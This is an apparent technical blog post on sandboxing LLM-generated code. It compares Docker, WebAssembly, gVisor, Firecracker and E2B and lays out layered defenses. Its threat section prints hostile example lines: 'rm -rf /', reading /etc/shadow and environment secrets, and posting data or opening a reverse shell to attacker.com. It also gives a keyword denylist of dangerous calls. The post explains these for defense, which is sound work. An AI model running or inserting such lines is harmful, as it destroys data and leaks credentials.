Security AI Software Engineering DevOps LLMs

Sandboxing LLM-Generated Code: Running Untrusted AI Code Safely

Docker, WebAssembly, Firecracker, and E2B. How to execute code your LLM generated without burning down your infrastructure.

ShibinFebruary 13, 202611 min read

Sandboxing LLM-Generated Code: Running Untrusted AI Code Safely

The Problem: AI Wrote a Rootkit (Probably Not On Purpose)

You're building an AI code generation tool. The LLM writes:

import os
os.system("rm -rf /")

Or maybe it's subtle:

import requests
requests.post("http://attacker.com", data=get_all_files())

Or it's just a bug:

while True:
    huge_array = [0] * 999999999999

Your LLM didn't mean to brick your system. It just hallucinates code sometimes. And now you've got a problem: how do you run code an untrusted source (even if it's trying to be helpful) without it destroying everything?

This is the sandboxing problem. And in 2026, it's not theoretical anymore. AI agents that execute code, data analysis tools, code generation platforms—they all need to solve this.

The answer is: you can't make it 100% safe, but you can make it safe enough.

Why Should You Care?

If you're building anything with code execution:

Data analysis platform (user asks AI to process CSV and generate charts)
Code generation tool (LLM writes code, you run it to test)
AI agent that writes and executes scripts
Research tool that evaluates AI-generated code
Any product where the AI outputs executable code

If you're running AI-generated code:

You're running untrusted code by definition
The code might have bugs, backdoors, or unintended side effects
A single exploit can compromise your entire system
Your users are trusting you to contain the damage

The industry is waking up to this. GitHub Copilot must consider code execution safety. LangChain is building sandboxing into their framework. E2B raised $30M to commercialize code sandboxing. Google, OpenAI, and Anthropic all have teams focused on this problem.

This isn't optional anymore. It's required infrastructure.

Part 1: Understanding the Threat

Threat 1: Resource Exhaustion

The LLM generates code that:

Consumes infinite memory (infinite loops, huge arrays)
Max out CPU (cryptographic operations, tight loops)
Fill disk space (writing massive files)

Result: Your server crashes. Your other users can't run their code.

Threat 2: Side Channel Access

The code reads files it shouldn't:

with open("/etc/shadow", "r") as f:
    passwords = f.read()

Or accesses environment variables:

import os
print(os.environ)  # AWS_SECRET_ACCESS_KEY, DATABASE_PASSWORD, etc.

Result: Credentials leaked. Your database is compromised.

Threat 3: Network Exploitation

The code phones home:

import socket
socket.socket().connect(("attacker.com", 4444))
# Now attacker has reverse shell on your server

Or exfiltrates data:

requests.post("http://attacker.com/steal", json={"data": secret_data})

Result: Your infrastructure is pwned. Your users' data is stolen.

Threat 4: Host Escape

The code breaks out of sandboxing and reaches the host:

# Run arbitrary commands on the host
docker run -it ubuntu /bin/bash

Result: Game over. The sandbox is useless.

Threat 5: Side-Channel Attacks

The code doesn't exfiltrate data directly. Instead, it:

Measures timing to infer secrets
Uses covert channels (disk I/O patterns, memory access)
Probes CPU caches to leak data

Result: Data leak that's nearly impossible to detect.

Loading diagram...

Part 2: Sandbox Options (Tradeoffs)

Option 1: Docker Containers

The Idea: Run the code in a Docker container with limited resources and filesystem access.

FROM python:3.11-slim

WORKDIR /sandbox
COPY user_code.py .

CMD ["python", "user_code.py"]

Run with restrictions:

docker run \
  --rm \
  --cpus="0.5" \
  --memory="512m" \
  --read-only \
  --tmpfs /tmp:size=100m \
  -v /sandbox/input:/input:ro \
  sandbox-image

Pros:

Easy to set up
Good resource limits
Familiar technology
Widely understood

Cons:

Container escape is possible (though difficult)
Startup time: 100-500ms (slow for latency-critical apps)
Storage overhead: each container is hundreds of MB
Still has access to network by default
Side-channel attacks still possible within container

When to use: Batch processing, non-sensitive code, when 100ms startup time is acceptable.

Option 2: WebAssembly (WASM)

The Idea: Compile code to WebAssembly, run in a WASM runtime. WASM is sandboxed by design—it has no direct OS access.

# Python code → compile to WASM → execute in isolated runtime
# User writes Python. Tool converts to WASM.
# WASM has zero access to: filesystem, network, environment

# What the code CAN do:
- math operations
- string manipulation
- data processing
- call whitelisted functions

# What it CANNOT do:
- read files
- make network requests
- access environment
- fork processes
- allocate infinite memory

Pros:

True isolation (memory-safe by design)
Super fast startup: under 5ms
Minimal overhead: single WASM instance
Fine-grained access control (what functions can code call?)
Perfect for data processing, transformations

Cons:

No direct filesystem access (must be provided by host)
No native libraries (limited to pure code)
Fewer language options (Python support is experimental)
Not great for I/O-heavy workloads

When to use: Data transformation, mathematical operations, code that doesn't need filesystem. The future of safe code execution.

Option 3: gVisor (Google's Secure Container Runtime)

The Idea: Run containers, but intercept all system calls and execute them in user-space. Dramatically reduces attack surface.

Regular container: code → Linux kernel (one escape away)

gVisor: code → user-space OS emulation → Linux kernel (much safer)

Pros:

Much harder to escape than plain containers
Faster than VMs, slower than bare containers
Good for defense in depth

Cons:

Slightly slower (20-30% overhead)
More complex to set up
Still not unhackable (nothing is)

When to use: When you need container familiarity but more security than standard Docker.

Option 4: Firecracker (AWS's MicroVM)

The Idea: Lightweight virtual machines. Each code execution gets its own kernel, filesystem, etc.

# One-liner: spin up a full isolated kernel in 125ms
firecracker --config config.json

Pros:

True isolation (separate kernel)
Very fast: 125ms boot time
Can run full programs, multiple processes
Strong security boundary

Cons:

Heavier than WASM, lighter than Docker
Requires more infrastructure knowledge
Memory per instance: ~20MB

When to use: When you need real isolation but still want the flexibility of a full OS.

Option 5: E2B (Managed Sandbox-as-a-Service)

The Idea: Don't build sandboxing yourself. Use E2B, a platform designed for AI-generated code execution.

from e2b import Sandbox

sandbox = Sandbox()
result = sandbox.run_code("python", """
    print('Hello from sandbox!')
    with open('/tmp/test.txt', 'w') as f:
        f.write('data')
""")

Pros:

Managed for you (you don't handle infrastructure)
Built specifically for AI use cases
Good resource limits, monitoring, isolation
Fast iterations

Cons:

Cost per execution (fine for most use cases)
Vendor lock-in (but worth it for early stage)
Not for ultra-high-volume workloads

When to use: If you're a startup or building an AI feature and don't want to manage infrastructure.

Part 3: Layered Sandboxing (Defense in Depth)

The smartest approach isn't a single sandbox. It's layers.

Loading diagram...

Layer 1: Input Validation

Scan the code before executing:

def is_code_safe(code: str) -> bool:
    dangerous_patterns = [
        "os.system",
        "subprocess",
        "__import__",
        "open(",
        "socket",
        "requests.post",
        "eval",
        "exec"
    ]

    for pattern in dangerous_patterns:
        if pattern in code:
            return False

    return True

This won't catch everything (attackers can obfuscate), but it catches obvious stuff.

Layer 2: Static Analysis

Use tools like Bandit (for Python) to analyze code AST:

bandit -r user_code.py

Detects things like:

Hardcoded credentials
Unsafe deserialization
SQL injection patterns
Command injection

Layer 3: Process Isolation

Run the code in a sandbox (WASM, container, or both).

Layer 4: Resource Limits

Set hard limits:

import resource

# Max CPU: 5 seconds
resource.setrlimit(resource.RLIMIT_CPU, (5, 5))

# Max memory: 512MB
resource.setrlimit(resource.RLIMIT_AS, (512 * 1024 * 1024, 512 * 1024 * 1024))

# Max open files: 10
resource.setrlimit(resource.RLIMIT_NOFILE, (10, 10))

# Then run user code
exec(user_code)

Layer 5: Network Control

Disable network by default:

docker run \
  --network=none \
  sandbox-image

If the code needs network, whitelist specific endpoints:

docker run \
  --cap-drop=all \
  --cap-add=net_raw \
  -e ALLOWED_HOSTS="api.example.com" \
  sandbox-image

Layer 6: Monitoring & Alerting

Log everything:

Code execution started/completed
Resource usage peaks
Network connections attempted
Files accessed
Environment variables read

Alert if:

Execution time > 30 seconds
Memory usage > limit
Unexpected network access
File access outside /tmp

Part 4: Real-World Example

You're building a data analysis platform. User uploads CSV. AI generates Python code to analyze it:

import pandas as pd
import matplotlib.pyplot as plt

df = pd.read_csv('data.csv')
print(df.describe())

Your architecture:

User uploads CSV → stored in /uploads/{user_id}/data.csv
User asks AI to analyze → LLM generates Python code
You validate code → Check for dangerous patterns
Spin up sandbox → WASM or Docker with limits
Mount CSV as read-only → /data/data.csv (read-only)
Mount empty tmpfs → /tmp (write-only, 100MB limit)

Run code:

import pandas as pd

# Code runs here
# Can read /data/data.csv
# Can write to /tmp
# Cannot access /uploads, network, or env

Collect output → Charts, tables, generated from /tmp
Return to user → Profit

Attacker tries:

import os
os.system("rm -rf /")  # Fails: os.system not available in WASM
# Or if in container: rm -rf / runs but only affects /tmp

Result: Attack neutralized.

Common Mistakes

Mistake 1: Assuming one layer of defense is enough.

Docker alone? Container escape is possible. WASM alone? Side channels exist. Use layers.

Mistake 2: Forgetting about side channels.

You blocked filesystem and network access. But code can infer data through timing, memory access patterns, CPU cache behavior. This is hard to defend against. Assume some data leakage is possible.

Mistake 3: Not limiting resources aggressively.

"256MB memory should be fine." Then the LLM generates a 300MB array allocation. Your server OOM-kills it. Other users lose service.

Set limits lower than you think necessary. 128MB for most workloads. Increase if needed.

Mistake 4: Allowing network access.

"The code needs to call an API." So you enable network. Now the code can exfiltrate data.

Use a proxy, whitelist, or have the host make the API call on behalf of the code.

Mistake 5: Not monitoring.

"If something goes wrong, we'll notice." No you won't. Until your infrastructure is on fire.

Log everything. Alert on anomalies. Use observability tools.

The Future

The industry is converging on a few approaches:

WASM for safety-critical code — data transformation, mathematical operations
Lightweight VMs (Firecracker) for flexibility — full programs that need OS features
Managed services (E2B) for startups — pay per execution, don't manage infrastructure

By 2026, "AI-generated code execution" will have established patterns. You won't invent sandboxing from scratch. You'll use proven tools.

But none of them are bulletproof. The game is making attacks expensive, detectable, and limited in scope.

Next Steps

Start with WASM for data processing — it's the safest, fastest option
Add input validation — filter dangerous patterns before execution
Use E2B or similar if you don't want to manage infra — seriously, it's worth it
Layer defenses — input validation → static analysis → sandbox → resource limits → monitoring
Test attacks — actually try to break your sandbox. You'll find gaps.
Monitor in production — set up alerts for suspicious patterns

Sign-Off

The days of blindly running untrusted code are over. In an era where the code is generated by AI, sandboxing isn't paranoia—it's professional responsibility.

You're not protecting against sophisticated hackers. You're protecting against bugs in your own infrastructure, hallucinations in the LLM, and the one attacker who figures out your blind spots.

Build for the worst case. Run everything in a sandbox.